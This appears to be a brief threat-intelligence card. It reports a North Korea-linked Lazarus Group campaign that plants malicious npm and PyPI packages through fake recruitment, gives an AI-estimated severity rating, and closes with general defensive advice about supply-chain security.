Lazarus Campaign Plants Malicious Packages in npm and PyPI Ecosystems
Summary
The Lazarus Group, linked to North Korea, is conducting a fake recruitment campaign and planting malicious packages in the npm and PyPI repositories. This campaign, codenamed graphalgo, has been active since May 2025 and involves malicious packages designed to compromise developer systems.
IFF Assessment
FOE
A known APT group is actively targeting software supply chains with malicious packages.
Severity
8.1
High
(AI Estimated)
Defender Context
This highlights the increasing risk of supply chain attacks targeting open-source repositories. Defenders should implement robust software composition analysis (SCA) tools, verify package integrity, and educate developers on identifying suspicious packages. Monitoring network traffic for unusual connections initiated by development machines is also crucial.